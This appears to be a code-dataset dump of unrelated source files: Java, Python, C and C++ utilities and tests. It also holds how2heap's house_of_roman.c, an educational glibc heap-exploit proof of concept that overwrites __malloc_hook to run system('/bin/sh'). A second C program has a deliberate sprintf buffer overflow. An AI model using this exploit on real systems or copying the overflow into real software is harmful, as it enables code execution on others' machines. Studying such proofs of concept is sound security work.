max_stars_count
int64 301
224k
| text
stringlengths 6
1.05M
| token_count
int64 3
727k
|
---|---|---|
4,054 | <filename>messagebus_test/src/tests/speed/JavaClient.java
// Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
import com.yahoo.config.*;
import com.yahoo.messagebus.*;
import com.yahoo.messagebus.network.*;
import com.yahoo.messagebus.network.rpc.*;
import com.yahoo.messagebus.routing.*;
import com.yahoo.messagebus.test.*;

import java.util.Arrays;
import java.util.concurrent.atomic.AtomicLong;
import java.util.logging.*;
public class JavaClient implements ReplyHandler {
private static Logger log = Logger.getLogger(JavaClient.class.getName());
private static class Counts {
public int okCnt = 0;
public int failCnt = 0;
Counts() {}
Counts(int okCnt, int failCnt) {
this.okCnt = okCnt;
this.failCnt = failCnt;
}
}
private SourceSession session;
private Counts counts = new Counts();
private static long mySeq = 100000;
public JavaClient(RPCMessageBus mb) {
session = mb.getMessageBus().createSourceSession(this, new SourceSessionParams().setTimeout(30));
}
public synchronized Counts sample() {
return new Counts(counts.okCnt, counts.failCnt);
}
public void send() {
send(++mySeq);
}
public void send(long seq) {
session.send(new MyMessage(seq), "test");
}
public void handleReply(Reply reply) {
if ((reply.getProtocol() == SimpleProtocol.NAME)
&& (reply.getType() == SimpleProtocol.REPLY)
&& (((SimpleReply)reply).getValue().equals("OK")))
{
synchronized (this) {
counts.okCnt++;
}
} else {
synchronized (this) {
counts.failCnt++;
}
}
try {
send();
} catch (IllegalStateException ignore) {} // handle paranoia for shutdown source sessions
}
public void shutdown() {
session.destroy();
}
public static void main(String[] args) {
try {
RPCMessageBus mb = new RPCMessageBus(
new MessageBusParams()
.setRetryPolicy(new RetryTransientErrorsPolicy().setBaseDelay(0.1))
.addProtocol(new SimpleProtocol()),
new RPCNetworkParams()
.setIdentity(new Identity("server/java"))
.setSlobrokConfigId("file:slobrok.cfg"),
"file:routing.cfg");
JavaClient client = new JavaClient(mb);
// let the system 'warm up'
Thread.sleep(5000);
// inject messages into the feedback loop
for (int i = 0; i < 1024; ++i) {
client.send(i);
}
// let the system 'warm up'
Thread.sleep(5000);
long start;
long stop;
Counts before;
Counts after;
start = System.currentTimeMillis();
before = client.sample();
Thread.sleep(10000); // Benchmark time
stop = System.currentTimeMillis();
after = client.sample();
stop -= start;
double time = (double)stop;
double msgCnt = (double)(after.okCnt - before.okCnt);
double throughput = (msgCnt / time) * 1000.0;
System.out.printf("JAVA-CLIENT: %g msg/s\n", throughput);
client.shutdown();
mb.destroy();
if (after.failCnt > before.failCnt) {
System.err.printf("JAVA-CLIENT: FAILED (%d -> %d)\n",
before.failCnt, after.failCnt);
System.exit(1);
}
} catch (Exception e) {
log.log(Level.SEVERE, "JAVA-CLIENT: Failed", e);
System.exit(1);
}
}
private static class MyMessage extends SimpleMessage {
final long seqId;
MyMessage(long seqId) {
super("message");
this.seqId = seqId;
}
@Override
public boolean hasSequenceId() {
return true;
}
@Override
public long getSequenceId() {
return seqId;
}
}
}
| 1,972 |
345 | <reponame>michael-hahn/django-lfs
import os
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    help = 'Regenerate thumbnails for Shop, Category and Image models if they are missing.'

    def handle(self, *args, **options):
        """Walk every Shop/Category/Image row and create any thumbnail size
        that is missing on disk. Existing thumbnail files are left untouched.
        """
        from django.conf import settings
        from lfs.core.models import Shop
        from lfs.core.fields import thumbs
        from lfs.catalog.settings import THUMBNAIL_SIZES
        from lfs.catalog.models import Category
        from lfs.catalog.models import Image

        for model in [Shop, Category, Image]:
            for obj in model.objects.all():
                img_file = obj.image
                if not img_file.name:
                    continue
                self.stdout.write("Converting %s" % img_file.name)
                # Split "name.ext" once, outside the size loop. Guard names
                # without an extension, which previously raised IndexError.
                base, sep, ext = img_file.name.rpartition('.')
                if not sep:
                    self.stdout.write("\tSkipped %s: no file extension" % img_file.name)
                    continue
                for size in THUMBNAIL_SIZES:
                    (w, h) = size
                    thumb_name = '%s.%sx%s.%s' % (base, w, h, ext)
                    # os.path.join instead of "%s/%s" so MEDIA_ROOT with or
                    # without a trailing separator works on any platform.
                    if os.path.isfile(os.path.join(settings.MEDIA_ROOT, thumb_name)):
                        self.stdout.write("\tSize %sx%s already exists" % (w, h))
                        continue
                    thumb_content = thumbs.generate_thumb(img_file, size, ext)
                    img_file.storage.save(thumb_name, thumb_content)
                    self.stdout.write("\tSize %sx%s created" % (w, h))
| 747 |
5,620 | <reponame>zha0/how2heap<filename>glibc_2.23/house_of_roman.c
#define _GNU_SOURCE /* for RTLD_NEXT */
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <malloc.h>
#include <dlfcn.h>
char* shell = "/bin/sh\x00";
/*
Technique was tested on GLibC 2.23, 2.24 via the glibc_build.sh script inside of how2heap on Ubuntu 16.04. 2.25 was tested on Ubuntu 17.04.
Compile: gcc -fPIE -pie house_of_roman.c -o house_of_roman
POC written by <NAME> (Strikeout)
*/
/* Turn off stdio buffering: buffered printf/puts allocate internally and
   would disturb the heap layout this PoC depends on.
   Fixed: was declared `void* init()` while returning nothing, so reading
   its (nonexistent) return value would have been undefined behavior. */
void init(void) {
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stdin, NULL, _IONBF, 0);
}
/* NOTE(review): the heap feng shui below depends on the exact order and
   sizes of every malloc/free — do not reorder or "clean up" statements. */
int main(){

    /*
       The main goal of this technique is to create a **leakless** heap
       exploitation technique in order to get a shell. This is mainly
       done using **relative overwrites** in order to get pointers in
       the proper locations without knowing the exact value of the pointer.

       The first step is to get a pointer inside of __malloc_hook. This
       is done by creating a fastbin bin that looks like the following:
       ptr_to_chunk -> ptr_to_libc. Then, we alter the ptr_to_libc
       (with a relative overwrite) to point to __malloc_hook.

       The next step is to run an unsorted bin attack on the __malloc_hook
       (which is now controllable from the previous attack). Again, we run
       the unsorted_bin attack by altering the chunk->bk with a relative overwrite.

       Finally, after launching the unsorted_bin attack to put a libc value
       inside of __malloc_hook, we use another relative overwrite on the
       value of __malloc_hook to point to a one_gadget, system or some other function.

       Now, the next time we run malloc we pop a shell! :)
       However, this does come at a cost: 12 bits of randomness must be
       brute forced (0.02% chance) of working.

       The original write up for the *House of Roman* can be found at
       https://gist.github.com/romanking98/9aab2804832c0fb46615f025e8ffb0bc#assumptions.

       This technique requires the ability to edit fastbin and unsorted bin
       pointers via UAF or overflow of some kind. Additionally, good control
       over the allocation sizes and freeing is required for this technique.
    */

    char* introduction = "\nWelcome to the House of Roman\n\n"
        "This is a heap exploitation technique that is LEAKLESS.\n"
        "There are three stages to the attack: \n\n"
        "1. Point a fastbin chunk to __malloc_hook.\n"
        "2. Run the unsorted_bin attack on __malloc_hook.\n"
        "3. Relative overwrite on main_arena at __malloc_hook.\n\n"
        "All of the stuff mentioned above is done using two main concepts:\n"
        "relative overwrites and heap feng shui.\n\n"
        "However, this technique comes at a cost:\n"
        "12-bits of entropy need to be brute forced.\n"
        "That means this technique only work 1 out of every 4096 tries or 0.02%.\n"
        "**NOTE**: For the purpose of this exploit, we set the random values in order to make this consisient\n\n\n";

    puts(introduction);
    init();

    /*
       Part 1: Fastbin chunk points to __malloc_hook.

       Getting the main_arena in a fastbin chunk ordering is the first step.
       This requires a ton of heap feng shui in order to line this up properly.
       However, at a glance, it looks like the following:

       First, we need to get a chunk that is in the fastbin with a pointer to
       a heap chunk in the fd.
       Second, we point this chunk to a pointer to LibC (in another heap chunk).
       All of the setup below is in order to get the configuration mentioned
       above set up to perform the relative overwrites.

       Getting the pointer to libC can be done in two ways:
           - A split from a chunk in the small/large/unsorted_bins
             gets allocated to a size of 0x70.
           - Overwrite the size of a small/large chunk used previously to 0x71.
       For the sake of example, this uses the first option because it
       requires less vulnerabilities.
    */
    puts("Step 1: Point fastbin chunk to __malloc_hook\n\n");
    puts("Setting up chunks for relative overwrites with heap feng shui.\n");

    // Use this as the UAF chunk later to edit the heap pointer later to point to the LibC value.
    uint8_t* fastbin_victim = malloc(0x60);

    // Allocate this in order to have good alignment for relative
    // offsets later (only want to overwrite a single byte to prevent
    // 4 bits of brute force on the heap).
    malloc(0x80);

    // Offset 0x100
    uint8_t* main_arena_use = malloc(0x80);

    // Offset 0x190
    // This ptr will be used for a relative offset on the 'main_arena_use' chunk
    uint8_t* relative_offset_heap = malloc(0x60);

    // Free the chunk to put it into the unsorted_bin.
    // This chunk will have a pointer to main_arena + 0x68 in both the fd and bk pointers.
    free(main_arena_use);

    /*
       Get part of the unsorted_bin chunk (the one that we just freed).
       We want this chunk because the fd and bk of this chunk will
       contain main_arena ptrs (used for relative overwrite later).

       The size is particularly set at 0x60 to put this into the 0x70 fastbin later.
       This has to be the same size because the __malloc_hook fake
       chunk (used later) uses the fastbin size of 0x7f. There is
       a security check (within malloc) that the size of the chunk matches the fastbin size.
    */
    puts("Allocate chunk that has a pointer to LibC main_arena inside of fd ptr.\n");
    // Offset 0x100. Has main_arena + 0x68 in fd and bk.
    uint8_t* fake_libc_chunk = malloc(0x60);

    // NOTE: This is NOT part of the exploit...
    // The __malloc_hook is calculated in order for the offsets to be found so that this exploit works on a handful of versions of GLibC.
    long long __malloc_hook = ((long*)fake_libc_chunk)[0] - 0xe8;

    // We need the filler because the overwrite below needs
    // to have a ptr in the fd slot in order to work.
    // Freeing this chunk puts a chunk in the fd slot of 'fastbin_victim' to be used later.
    free(relative_offset_heap);

    /*
       Create a UAF on the chunk. Recall that the chunk that fastbin_victim
       points to is currently at the offset 0x190 (heap_relative_offset).
    */
    free(fastbin_victim);

    /*
       Now, we start doing the relative overwrites, since we have
       the pointers in their proper locations. The layout is very important to
       understand for this.

       Current heap layout:
           0x0:   fastbin_victim       - size 0x70
           0x70:  alignment_filler     - size 0x90
           0x100: fake_libc_chunk      - size 0x70
           0x170: leftover_main        - size 0x20
           0x190: relative_offset_heap - size 0x70

       bin layout:
           fastbin:  fastbin_victim -> relative_offset_heap
           unsorted: leftover_main

       Now, the relative overwriting begins:
       Recall that fastbin_victim points to relative_offset_heap
       (which is in the 0x100-0x200 offset range). The fastbin uses a singly
       linked list, with the next chunk in the 'fd' slot.

       By *partially* editing the fastbin_victim's last byte (from 0x90
       to 0x00) we have moved the fd pointer of fastbin_victim to
       fake_libc_chunk (at offset 0x100).

       Also, recall that fake_libc_chunk had previously been in the unsorted_bin.
       Because of this, it has a fd pointer that points to main_arena + 0x68.

       Now, the fastbin looks like the following:
           fastbin_victim -> fake_libc_chunk -> (main_arena + 0x68).

       The relative overwrites (mentioned above) will be demonstrated step by step below.
    */
    puts("\
Overwrite the first byte of a heap chunk in order to point the fastbin chunk\n\
to the chunk with the LibC address\n");
    puts("\
Fastbin 0x70 now looks like this:\n\
heap_addr -> heap_addr2 -> LibC_main_arena\n");
    fastbin_victim[0] = 0x00; // The location of this is at 0x100. But, we only want to overwrite the first byte. So, we put 0x0 for this.

    /*
       Now, we have a fastbin that looks like the following:
           0x70: fastbin_victim -> fake_libc_chunk -> (main_arena + 0x68)

       We want the fd ptr in fake_libc_chunk to point to something useful.
       So, let's edit this to point to the location of the __malloc_hook.
       This way, we can get control of a function ptr.

       To do this, we need a valid malloc size. Within the __memalign_hook
       is usually an address that usually starts with 0x7f.
       Because the values right before the __memalign_hook value are all 0s,
       we could use a misaligned chunk to get this to work as a valid size in
       the 0x70 fastbin.

       This is where the first 4 bits of randomness come into play.
       The first 12 bits of the LibC address are deterministic for the address.
       However, the next 4 (for a total of 2 bytes) are not.

       So, we have to brute force 2^4 different possibilities (16)
       in order to get this in the correct location. This 'location'
       is different for each version of GLibC (should be noted).

       After doing this relative overwrite, the fastbin looks like the following:
           0x70: fastbin_victim -> fake_libc_chunk -> (__malloc_hook - 0x23).
    */

    /*
       Relatively overwrite the main_arena pointer to point to a valid
       chunk close to __malloc_hook.

       NOTE: In order to make this exploit consistent
       (not brute forcing with hardcoded offsets), we MANUALLY set the values.
       In the actual attack, these values would need to be specific
       to a version and some of the bits would have to be brute forced
       (depending on the bits).
    */
    puts("\
Use a relative overwrite on the main_arena pointer in the fastbin.\n\
Point this close to __malloc_hook in order to create a fake fastbin chunk\n");
    long long __malloc_hook_adjust = __malloc_hook - 0x23; // We subtract 0x23 from the malloc because we want to use a 0x7f as a valid fastbin chunk size.

    // The relative overwrite
    int8_t byte1 = (__malloc_hook_adjust) & 0xff;
    int8_t byte2 = (__malloc_hook_adjust & 0xff00) >> 8;
    fake_libc_chunk[0] = byte1; // Least significant bytes of the address.
    fake_libc_chunk[1] = byte2; // The upper most 4 bits of this must be brute forced in a real attack.

    // Two filler chunks prior to the __malloc_hook chunk in the fastbin.
    // These are fastbin_victim and fake_libc_chunk.
    puts("Get the fake chunk pointing close to __malloc_hook\n");
    puts("\
In a real exploit, this would fail 15/16 times\n\
because of the final half byet of the malloc_hook being random\n");
    malloc(0x60);
    malloc(0x60);

    // If the 4 bit brute force did not work, this will crash because
    // of the chunk size not matching the bin for the chunk.
    // Otherwise, the next step of the attack can begin.
    uint8_t* malloc_hook_chunk = malloc(0x60);

    puts("Passed step 1 =)\n\n\n");

    /*
       Part 2: Unsorted_bin attack

       Now, we have control over the location of the __malloc_hook.
       However, we do not know the address of LibC still. So, we cannot
       do much with this attack. In order to pop a shell, we need
       to get an address at the location of the __malloc_hook.

       We will use the unsorted_bin attack in order to change the value
       of the __malloc_hook with the address of main_arena + 0x68.
       For more information on the unsorted_bin attack, review
       https://github.com/shellphish/how2heap/blob/master/glibc_2.26/unsorted_bin_attack.c.

       For a brief overview, the unsorted_bin attack allows us to write
       main_arena + 0x68 to any location by altering the chunk->bk of
       an unsorted_bin chunk. We will choose to write this to the
       location of __malloc_hook.

       After we overwrite __malloc_hook with the main_arena, we will
       edit the pointer (with a relative overwrite) to point to a
       one_gadget for immediate code execution.

       Again, this relative overwrite works well but requires an additional
       1 byte (8 bits) of brute force.
       This brings the chances of a successful attempt up to 12 bits of
       randomness. This has about a 1/4096 or a 0.0244% chance of working.

       The steps for phase two of the attack are explained as we go below.
    */
    puts("\
Start Step 2: Unsorted_bin attack\n\n\
The unsorted bin attack gives us the ability to write a\n\
large value to ANY location. But, we do not control the value\n\
This value is always main_arena + 0x68. \n\
We point the unsorted_bin attack to __malloc_hook for a \n\
relative overwrite later.\n");

    // Get the chunk to corrupt. Add another ptr in order to prevent consolidation upon freeing.
    uint8_t* unsorted_bin_ptr = malloc(0x80);
    malloc(0x30); // Don't want to consolidate

    puts("Put chunk into unsorted_bin\n");
    // Free the chunk to create the UAF
    free(unsorted_bin_ptr);

    /* NOTE: The last 4 bits of byte2 would have been brute forced earlier.
       However, for the sake of example, this has been calculated dynamically.
    */
    __malloc_hook_adjust = __malloc_hook - 0x10; // This subtract 0x10 is needed because of the chunk->fd doing the actual overwrite on the unsorted_bin attack.
    byte1 = (__malloc_hook_adjust) & 0xff;
    byte2 = (__malloc_hook_adjust & 0xff00) >> 8;

    // Use another relative offset to overwrite the ptr of the chunk->bk pointer.
    // From the previous brute force (4 bits from before) we
    // know where the location of this is at. It is 5 bytes away from __malloc_hook.
    puts("Overwrite last two bytes of the chunk to point to __malloc_hook\n");
    unsorted_bin_ptr[8] = byte1; // Byte 0 of bk.
    // NOTE: Normally, the second half of the byte would HAVE to be brute forced. However, for the sake of example, we set this in order to make the exploit consistent.
    unsorted_bin_ptr[9] = byte2; // Byte 1 of bk. The second 4 bits of this was brute forced earlier, the first 4 bits are static.

    /*
       Trigger the unsorted bin attack.
       This will write the value of (main_arena + 0x68) to whatever is in the bk ptr + 0x10.

       A few things do happen though:
           - This makes the unsorted bin (hence, small and large too)
             unusable. So, only allocations previously in the fastbin can only be used now.
           - If the same size chunk (the unsorted_bin attack chunk)
             is NOT malloc'ed, the program will crash immediately afterwards.
             So, the allocation request must be the same as the unsorted_bin chunk.

       The first point is totally fine (in this attack). But, in more complicated
       programming, this can be an issue.
       The second just requires us to do the same size allocation as the current chunk.
    */
    puts("Trigger the unsorted_bin attack\n");
    malloc(0x80); // Trigger the unsorted_bin attack to overwrite __malloc_hook with main_arena + 0x68

    long long system_addr = (long long)dlsym(RTLD_NEXT, "system");

    puts("Passed step 2 =)\n\n\n");

    /*
       Step 3: Set __malloc_hook to system

       The chunk itself is allocated 19 bytes away from __malloc_hook.
       So, we use a relative overwrite (again) in order to partially overwrite
       the main_arena pointer (from unsorted_bin attack) to point to system.

       In a real attack, the first 12 bits are static (per version).
       But, after that, the next 12 bits must be brute forced.

       NOTE: For the sake of example, we will be setting these values, instead of brute forcing them.
    */
    puts("Step 3: Set __malloc_hook to system/one_gadget\n\n");
    puts("\
Now that we have a pointer to LibC inside of __malloc_hook (from step 2), \n\
we can use a relative overwrite to point this to system or a one_gadget.\n\
Note: In a real attack, this would be where the last 8 bits of brute forcing\n\
comes from.\n");
    malloc_hook_chunk[19] = system_addr & 0xff; // The first 12 bits are static (per version).
    malloc_hook_chunk[20] = (system_addr >> 8) & 0xff; // The last 4 bits of this must be brute forced (done previously already).
    malloc_hook_chunk[21] = (system_addr >> 16) & 0xff; // The last byte is the remaining 8 bits that must be brute forced.
    malloc_hook_chunk[22] = (system_addr >> 24) & 0xff; // If the gap is between the data and text section is super wide, this is also needed. Just putting this in to be safe.

    // Trigger the malloc call for code execution via the system call being ran from the __malloc_hook.
    // In a real example, you would probably want to use a one_gadget.
    // But, to keep things portable, we will just use system and add a pointer to /bin/sh as the parameter.
    // Although this is kind of cheating (the binary is PIE), if the binary was not PIE having a pointer into the .bss section would work without a single leak.
    // To get the system address (earlier on for consistency), the binary must be PIE though. So, the address is put in here.
    puts("Pop Shell!");
    malloc((long long)shell);
}
| 5,334 |
320 |
/**
* Write a description of class bubble here.
*
* @author (your name)
* @version (a version number or a date)
*/
/**
 * Demonstrates bubble sort on a small fixed array and prints the result.
 */
public class SortBubble
{
    /** BlueJ-style no-arg entry point (kept for backward compatibility). */
    public static void main()
    {
        int[] a = {4, 6, 3, 2, 1, 8}; //Can be taken as an input
        bubbleSort(a);
        System.out.println("The given array in ascending order is as follows: ");
        for (int i = 0; i < a.length; i++) //loop for printing array
        {
            System.out.print(a[i] + " ");
        }
    }

    /** Standard JVM entry point so the class can be run from the command line. */
    public static void main(String[] args)
    {
        main();
    }

    /**
     * Sorts the array in place in ascending order using bubble sort, O(n^2).
     * Removed: unused temporaries t2/t3 and a println(a) that printed the
     * array's identity hash (e.g. "[I@1b6d...") instead of its contents.
     *
     * @param a array to sort; may be empty
     */
    static void bubbleSort(int[] a)
    {
        int n = a.length;
        for (int i = 0; i < n - 1; i++)          // i counts completed passes
        {
            for (int j = 0; j < n - i - 1; j++)  // bubble the largest remaining element up
            {
                if (a[j] > a[j + 1])
                {
                    int temp = a[j];
                    a[j] = a[j + 1];
                    a[j + 1] = temp;
                }
            }
        }
    }
}
| 619 |
415 | #include <stdio.h>
// The code is vulnerable on purpose
/* Deliberately vulnerable demo (see note above): sprintf() into a 30-byte
   buffer with no length limit — argv[1] longer than ~11 chars overflows buf.
   Also note argv[1] is NULL when run without arguments, which is undefined
   behavior for %s. Left as-is on purpose; do NOT "fix" this sample. */
int main (int argc, char**argv) {
    char buf[30];
    sprintf(buf, "Provided value = %s", argv[1]); // intentional overflow sink
    puts(buf);
    return(0);
}
| 81 |
528 | // This file is composed from parts from skia library (https://github.com/google/skia/)
// Please check skia license if it fits (https://github.com/google/skia/blob/master/LICENSE)
#if !defined(SK_CPU_BENDIAN) && !defined(SK_CPU_LENDIAN)
#if defined(__sparc) || defined(__sparc__) || \
defined(_POWER) || defined(__powerpc__) || \
defined(__ppc__) || defined(__hppa) || \
defined(__PPC__) || defined(__PPC64__) || \
defined(_MIPSEB) || defined(__ARMEB__) || \
defined(__s390__) || \
(defined(__sh__) && defined(__BIG_ENDIAN__)) || \
(defined(__ia64) && defined(__BIG_ENDIAN__))
#define SK_CPU_BENDIAN
#else
#define SK_CPU_LENDIAN
#endif
#endif
#define SK_A32_BITS 8
#define SK_R32_BITS 8
#define SK_G32_BITS 8
#define SK_B32_BITS 8
#ifdef SK_CPU_BENDIAN
#define SK_R32_SHIFT 24
#define SK_G32_SHIFT 16
#define SK_B32_SHIFT 8
#define SK_A32_SHIFT 0
#else
#define SK_R32_SHIFT 0
#define SK_G32_SHIFT 8
#define SK_B32_SHIFT 16
#define SK_A32_SHIFT 24
#endif
#define SK_A32_MASK ((1 << SK_A32_BITS) - 1)
#define SK_R32_MASK ((1 << SK_R32_BITS) - 1)
#define SK_G32_MASK ((1 << SK_G32_BITS) - 1)
#define SK_B32_MASK ((1 << SK_B32_BITS) - 1)
#define SkGetPackedA32(packed) ((uint32_t)((packed) << (24 - SK_A32_SHIFT)) >> 24)
#define SkGetPackedR32(packed) ((uint32_t)((packed) << (24 - SK_R32_SHIFT)) >> 24)
#define SkGetPackedG32(packed) ((uint32_t)((packed) << (24 - SK_G32_SHIFT)) >> 24)
#define SkGetPackedB32(packed) ((uint32_t)((packed) << (24 - SK_B32_SHIFT)) >> 24)
#define SK_R16_BITS 5
#define SK_G16_BITS 6
#define SK_B16_BITS 5
#define SK_R16_SHIFT (SK_B16_BITS + SK_G16_BITS)
#define SK_G16_SHIFT (SK_B16_BITS)
#define SK_B16_SHIFT 0
#define SK_R16_MASK ((1 << SK_R16_BITS) - 1)
#define SK_G16_MASK ((1 << SK_G16_BITS) - 1)
#define SK_B16_MASK ((1 << SK_B16_BITS) - 1)
#define SkGetPackedR16(color) (((unsigned)(color) >> SK_R16_SHIFT) & SK_R16_MASK)
#define SkGetPackedG16(color) (((unsigned)(color) >> SK_G16_SHIFT) & SK_G16_MASK)
#define SkGetPackedB16(color) (((unsigned)(color) >> SK_B16_SHIFT) & SK_B16_MASK)
/* Expand a SK_R16_BITS-wide red channel to 8 bits by replicating its
   high-order bits into the low end, so 0 maps to 0 and the max maps to 255. */
static inline unsigned SkR16ToR32(unsigned r)
{
    unsigned high = r << (8 - SK_R16_BITS);
    unsigned low = r >> (2 * SK_R16_BITS - 8);
    return high | low;
}
/* Expand a SK_G16_BITS-wide green channel to 8 bits by replicating its
   high-order bits into the low end, so 0 maps to 0 and the max maps to 255. */
static inline unsigned SkG16ToG32(unsigned g)
{
    unsigned high = g << (8 - SK_G16_BITS);
    unsigned low = g >> (2 * SK_G16_BITS - 8);
    return high | low;
}
/* Expand a SK_B16_BITS-wide blue channel to 8 bits by replicating its
   high-order bits into the low end, so 0 maps to 0 and the max maps to 255. */
static inline unsigned SkB16ToB32(unsigned b)
{
    unsigned high = b << (8 - SK_B16_BITS);
    unsigned low = b >> (2 * SK_B16_BITS - 8);
    return high | low;
}
#define SkPacked16ToR32(c) SkR16ToR32(SkGetPackedR16(c))
#define SkPacked16ToG32(c) SkG16ToG32(SkGetPackedG16(c))
#define SkPacked16ToB32(c) SkB16ToB32(SkGetPackedB16(c))
| 1,379 |
14,668 | import itertools
__all__ = ["apply_mask"]
def apply_mask(data: bytes, mask: bytes) -> bytes:
    """
    Apply masking to the data of a WebSocket message.

    XOR is its own inverse, so applying the same mask twice restores the data.

    :param data: Data to mask
    :param mask: 4-bytes mask
    """
    if len(mask) != 4:
        raise ValueError("mask must contain 4 bytes")
    # index & 3 == index % 4, cycling through the four mask bytes.
    return bytes(value ^ mask[index & 3] for index, value in enumerate(data))
| 140 |
7,451 | from ..field import Field
from ..scalars import String
class CustomField(Field):
    """Field subclass used in the tests below to carry an extra ``metadata``
    mapping alongside the standard Field behavior."""

    def __init__(self, *args, **kwargs):
        # Pop "metadata" before delegating so the base Field never sees it.
        self.metadata = kwargs.pop("metadata", None)
        super(CustomField, self).__init__(*args, **kwargs)
def test_mounted_type():
    """Field.mounted wraps an unmounted String into a Field of that type."""
    mounted = Field.mounted(String())
    assert isinstance(mounted, Field)
    assert mounted.type == String
def test_mounted_type_custom():
    """CustomField.mounted preserves both the subclass and its metadata."""
    mounted = CustomField.mounted(String(metadata={"hey": "yo!"}))
    assert isinstance(mounted, CustomField)
    assert mounted.type == String
    assert mounted.metadata == {"hey": "yo!"}
| 222 |
1,431 | /* ====================================================================
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==================================================================== */
package org.apache.poi.ss.formula.functions;
import static org.apache.poi.ss.util.Utils.addRow;
import static org.apache.poi.ss.util.Utils.assertDouble;
import static org.junit.jupiter.api.Assertions.assertEquals;
import org.apache.poi.hssf.usermodel.HSSFCell;
import org.apache.poi.hssf.usermodel.HSSFFormulaEvaluator;
import org.apache.poi.hssf.usermodel.HSSFSheet;
import org.apache.poi.hssf.usermodel.HSSFWorkbook;
import org.apache.poi.ss.formula.eval.ErrorEval;
import org.apache.poi.ss.formula.eval.NumberEval;
import org.apache.poi.ss.formula.eval.StringEval;
import org.apache.poi.ss.formula.eval.ValueEval;
import org.junit.jupiter.api.Test;
import java.io.IOException;
/**
* Tests for {@link Quotient}
*/
class TestQuotient {
private static ValueEval invokeValue(String numerator, String denominator) {
ValueEval[] args = new ValueEval[]{new StringEval(numerator), new StringEval(denominator)};
return new Quotient().evaluate(args, -1, -1);
}
private static void confirmValue(String msg, String numerator, String denominator, String expected) {
ValueEval result = invokeValue(numerator, denominator);
assertEquals(NumberEval.class, result.getClass());
assertEquals(expected, ((NumberEval) result).getStringValue(), msg);
}
private static void confirmValueError(String msg, String numerator, String denominator, ErrorEval numError) {
ValueEval result = invokeValue(numerator, denominator);
assertEquals(ErrorEval.class, result.getClass());
assertEquals(numError, result, msg);
}
@Test
void testBasic() {
confirmValue("Integer portion of 5/2 (2)", "5", "2", "2");
confirmValue("Integer portion of 4.5/3.1 (1)", "4.5", "3.1", "1");
confirmValue("Integer portion of -10/3 (-3)", "-10", "3", "-3");
confirmValue("Integer portion of -5.5/2 (-2)", "-5.5", "2", "-2");
confirmValue("Integer portion of Pi/Avogadro (0)", "3.14159", "6.02214179E+23", "0");
}
@Test
void testErrors() {
confirmValueError("numerator is nonnumeric", "ABCD", "", ErrorEval.VALUE_INVALID);
confirmValueError("denominator is nonnumeric", "", "ABCD", ErrorEval.VALUE_INVALID);
confirmValueError("dividing by zero", "3.14159", "0", ErrorEval.DIV_ZERO);
}
@Test
void testWithCellRefs() throws IOException {
try (HSSFWorkbook wb = new HSSFWorkbook()) {
HSSFSheet sheet = wb.createSheet();
addRow(sheet, 0, 5, 2);
HSSFFormulaEvaluator fe = new HSSFFormulaEvaluator(wb);
HSSFCell cell = wb.getSheetAt(0).getRow(0).createCell(100);
assertDouble(fe, cell, "QUOTIENT(A1, B1)", 2.0);
}
}
} | 1,333 |
24,910 | from .keccak import SHA3
__all__ = ['SHA3']
| 19 |
636 | <gh_stars>100-1000
from indy import payment
import json
import pytest
# Canned GET_AUTH_RULE ledger reply: one ADD-action rule on the "role" field
# whose constraint requires a single trustee ("0") signature and carries the
# fee alias "1" in its metadata.
get_auth_rule_resp = {
    "result": {
        "data": [{
            "new_value": "0",
            "constraint": {
                "need_to_be_owner": False,
                "sig_count": 1,
                "metadata": {
                    "fees": "1"
                },
                "role": "0",
                "constraint_id": "ROLE"
            },
            "field": "role",
            "auth_type": "1",
            "auth_action": "ADD"
        }],
        "identifier": "LibindyDid111111111111",
        "auth_action": "ADD",
        "new_value": "0",
        "reqId": 15616,
        "auth_type": "1",
        "type": "121",
        "field": "role"
    },
    "op": "REPLY"
}

# Requester profile that satisfies the constraint above.
requester_info = {
    "role": "0",
    "need_to_be_owner": False,
    "sig_count": 1,
}

# Fee schedule mapping alias "1" -> 100 tokens.
fees = {
    "1": 100
}
@pytest.mark.asyncio
async def test_get_request_info():
    """get_request_info merges the auth rule, requester info and fee schedule
    into a price plus the list of signature requirements."""
    response_json = json.dumps(get_auth_rule_resp)
    requester_json = json.dumps(requester_info)
    fees_json = json.dumps(fees)
    raw_info = await payment.get_request_info(response_json, requester_json, fees_json)
    assert json.loads(raw_info) == {
        'price': 100,
        'requirements': [{
            'role': '0',
            'need_to_be_owner': False,
            'sig_count': 1,
        }]
    }
| 795 |
34,359 | /*++
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
Module Name:
- IAccessibilityNotifier.hpp
Abstract:
- OneCore implementation of the IAccessibilityNotifier interface.
Author(s):
- <NAME> (HeGatta) 29-Mar-2017
--*/
#pragma once
#include "../inc/IAccessibilityNotifier.hpp"
#pragma hdrstop
namespace Microsoft::Console::Interactivity::OneCore
{
    // OneCore implementation of IAccessibilityNotifier (declaration only; the
    // definitions live in the matching .cpp). Each override forwards one kind
    // of console accessibility event — caret movement, scrolling, text
    // updates, layout changes, and application start/stop.
    class AccessibilityNotifier : public IAccessibilityNotifier
    {
    public:
        void NotifyConsoleCaretEvent(_In_ const til::rect& rectangle) noexcept override;
        void NotifyConsoleCaretEvent(_In_ ConsoleCaretEventFlags flags, _In_ LONG position) noexcept override;
        void NotifyConsoleUpdateScrollEvent(_In_ LONG x, _In_ LONG y) noexcept override;
        void NotifyConsoleUpdateSimpleEvent(_In_ LONG start, _In_ LONG charAndAttribute) noexcept override;
        void NotifyConsoleUpdateRegionEvent(_In_ LONG startXY, _In_ LONG endXY) noexcept override;
        void NotifyConsoleLayoutEvent() noexcept override;
        void NotifyConsoleStartApplicationEvent(_In_ DWORD processId) noexcept override;
        void NotifyConsoleEndApplicationEvent(_In_ DWORD processId) noexcept override;
    };
}
| 426 |
571 | """
Copyright 2021 Nirlep_5252_
